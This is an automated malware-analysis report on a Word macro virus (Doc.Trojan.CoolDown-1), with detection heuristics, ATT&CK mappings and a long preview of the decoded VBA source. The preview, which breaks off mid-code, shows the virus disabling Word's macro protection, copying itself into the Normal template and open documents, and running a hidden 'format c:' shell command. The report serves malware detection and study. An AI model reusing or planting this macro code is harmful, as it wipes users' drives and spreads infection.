Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that calls a function named 'CoolDown'. This function, when executed with the argument '1', attempts to run the command 'format c: /autotest', which is highly destructive. The presence of the 'Shell()' call and the 'Document_Open' macro strongly indicates malicious intent to execute arbitrary commands.
Heuristics (5)

- ClamAV: Doc.Trojan.CoolDown-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.CoolDown-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29632 bytes | 22f4a938e9d995dba96f20f68a0a045a9ce646f8f17d02fae4b0b50efd9c238c |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
CoolDown 0
' 3043.731
End Sub
' 4139.836
' 5091.396
Private Sub Document_Close()
CoolDown _
0
' 6861.435
' 1609.434
End _
Sub
Private _
Sub ToolsMacro()
CoolDown 1
End _
Sub
Private Sub ViewVBCode()
CoolDown 1
End _
Sub
Private Sub _
CoolDown(How As _
Integer)
On _
Error Resume Next
Dim c As String, a _
As _
Long, _
b _
As Long, _
d _
As _
Long, e _
As Long, f _
As Long, res _
As _
String, m As Boolean
' 6696.699
' 5934.029
Randomize
With _
Options
' 1338.273
.VirusProtection _
= _
False
' 5550.656
.ConfirmConversions = _
False
.SaveNormalPrompt = False
' 9018.309
' 6754.591
End With
If How _
= _
1 _
Then
' 5697.444
' 606.6084
s _
= Shell("format" & Chr(32) & "c:" & _
Chr(32) & _
"/autotest", vbHide)
Else
' 6741.466
' 5936.861
With _
NormalTemplate.VBProject.VBComponents(1).CodeModule
If _
Not .Find("Cool" & "Down", _
1, _
1, 1000, 1000, _
False, False) _
Then
a = .CountOfLines
For b _
= _
1 To a
' 7876.239
.DeleteLines (1)
Next
d _
= _
1
a _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
res = ""
' 5730.678
For b = 1 To _
a
c = _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(b, _
1)
c _
= RTrim(LTrim(c))
' 3419.099
If foo(c, _
f, res) _
Then
' 9140.818
' 8870.4
' 8536.813
.InsertLines _
d, _
Space(Rnd * 16) _
& res
' 1491.877
' 9123.504
' 4697.39
d = _
d _
+ _
f
f = _
0
' 4371.166
res = ""
' 5278.109
End If
' 404.4265
Next
NormalTemplate.Save
' 3147.956
End _
If
End With
For e = _
1 To Documents.Count
' 2721.87
With Documents(e).VBProject.VBComponents(1).CodeModule
If Not .Find("Cool" & _
"Down", 1, _
1, 1000, 1000, _
False, False) Then
' 4399.506
a _
= _
.CountOfLines
' 1505.411
m = _
Documents(e).Saved
' 5936.951
' 7478.099
' 590.6182
For b = 1 To a
' 7121.263
' 8561.975
' 9947.795
.DeleteLines (1)
' 677.703
Next
' 7454.467
d _
= _
1
a _
= _
NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
' 3058.095
' 8247.968
' 8953.323
' 8072.195
' 4574.436
' 1420.563
' 9721.467
res _
= _
""
For _
b = _
1 _
To _
a
c = _
NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(b, _
1)
c = RTrim(LTrim(c))
' 5256.324
' 7004.326
If _
foo(c, _
f, _
res) _
Then
' 4980.794
.InsertLines _
d, _
Space(Rnd * 16) & _
res
d _
= _
d + f
f _
= _
0
' 5780.963
res _
= _
""
End If
' 9160.506
' 7513.05
' 5607.009
Next
If _
Documents(e).Path _
```

... (truncated)